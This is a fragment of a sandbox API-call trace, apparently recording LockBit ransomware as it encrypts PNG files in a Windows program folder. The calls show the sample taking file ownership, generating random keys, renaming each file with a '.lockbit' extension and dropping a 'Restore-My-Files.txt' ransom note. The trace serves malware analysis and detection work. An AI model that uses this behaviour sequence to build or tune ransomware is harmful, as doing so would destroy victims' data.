param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png.lockbit") returned 90 [0082.124] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.124] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.124] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.125] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.125] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.125] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.125] RtlFreeAnsiString (AnsiString="\\") [0082.125] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.125] malloc (_Size=0x200) returned 0x77d800 [0082.125] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.125] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.126] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.126] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.126] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.127] CloseHandle (hObject=0x3c4) returned 1 [0082.127] free (_Block=0x77d800) [0082.127] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.127] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.127] malloc (_Size=0x40068) returned 0x3d70048 [0082.127] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=233668) returned 1 [0082.127] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.128] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.128] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.128] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.133] malloc (_Size=0xca) returned 0x1ff1e60 [0082.133] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0x0 [0082.133] free (_Block=0x1ff1e60) [0082.133] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0082.133] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0082.133] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.134] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2c6fe3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_mainImage-mask.png", cAlternateFileName="")) returned 1 [0082.134] lstrcmpiW (lpString1=".", lpString2="Title_mainImage-mask.png") returned -1 [0082.134] lstrcmpiW (lpString1="..", lpString2="Title_mainImage-mask.png") returned -1 [0082.134] PathFindExtensionW (pszPath="Title_mainImage-mask.png") returned=".png" [0082.134] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.134] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.134] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.135] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.135] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.136] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.136] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] lstrcmpiW (lpString1="ntldr", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_mainImage-mask.png") returned -1 [0082.136] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0082.136] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png") returned=".png" [0082.136] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.136] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.136] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.136] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.137] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.137] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.137] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.137] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.137] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.137] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.137] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.138] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.138] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png.lockbit") returned 86 [0082.138] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.138] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.138] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.138] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.139] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.139] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.139] RtlFreeAnsiString (AnsiString="\\") [0082.139] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0082.139] malloc (_Size=0x200) returned 0x77d800 [0082.139] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.139] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.139] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.139] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.140] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.140] CloseHandle (hObject=0x3b4) returned 1 [0082.140] free (_Block=0x77d800) [0082.140] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0082.140] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.140] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.142] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4968) returned 1 [0082.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.143] ReadFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.147] malloc (_Size=0xc2) returned 0x77d800 [0082.148] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0082.148] free (_Block=0x77d800) [0082.148] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0082.148] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0082.148] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.148] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 1 [0082.148] lstrcmpiW (lpString1=".", lpString2="Title_select-highlight.png") returned -1 [0082.148] lstrcmpiW (lpString1="..", lpString2="Title_select-highlight.png") returned -1 [0082.148] PathFindExtensionW (pszPath="Title_select-highlight.png") returned=".png" [0082.149] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.149] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.149] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.149] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.149] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.150] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.150] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.151] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_select-highlight.png") returned -1 [0082.151] lstrcmpiW (lpString1="ntldr", lpString2="Title_select-highlight.png") returned -1 [0082.151] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_select-highlight.png") returned -1 [0082.151] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_select-highlight.png") returned -1 [0082.151] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_select-highlight.png") returned -1 [0082.151] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_select-highlight.png") returned -1 [0082.151] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_select-highlight.png") returned -1 [0082.151] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0082.151] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png") returned=".png" [0082.151] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.151] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.151] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.151] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.152] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.152] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.152] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png.lockbit") returned 88 [0082.152] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.155] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.155] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.155] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.156] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.156] RtlFreeAnsiString (AnsiString="\\") [0082.156] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0082.156] malloc (_Size=0x200) returned 0x77d800 [0082.156] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.156] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.156] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: 